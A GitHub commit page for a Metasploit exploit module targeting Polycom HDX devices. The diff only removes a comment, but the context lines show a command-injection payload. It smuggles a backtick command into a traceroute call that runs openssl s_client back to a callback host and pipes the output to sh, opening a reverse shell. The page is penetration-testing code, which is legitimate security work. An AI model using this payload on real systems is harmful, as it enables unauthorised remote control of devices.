Skip to content

Commit 676a08b

Browse files
author
Austin
authored
Update polycom_hdx_traceroute_exec.rb
1 parent 829a7a5 commit 676a08b

File tree

1 file changed

+0
-1
lines changed

1 file changed

+0
-1
lines changed

modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -105,7 +105,6 @@ def do_payload(sock)
105105

106106
# Figure out the port we picked
107107
cbport = self.service.getsockname[2]
108-
# Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
109108
cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
110109
sock.put(cmd)
111110
if datastore['VERBOSE']

0 commit comments

Comments
 (0)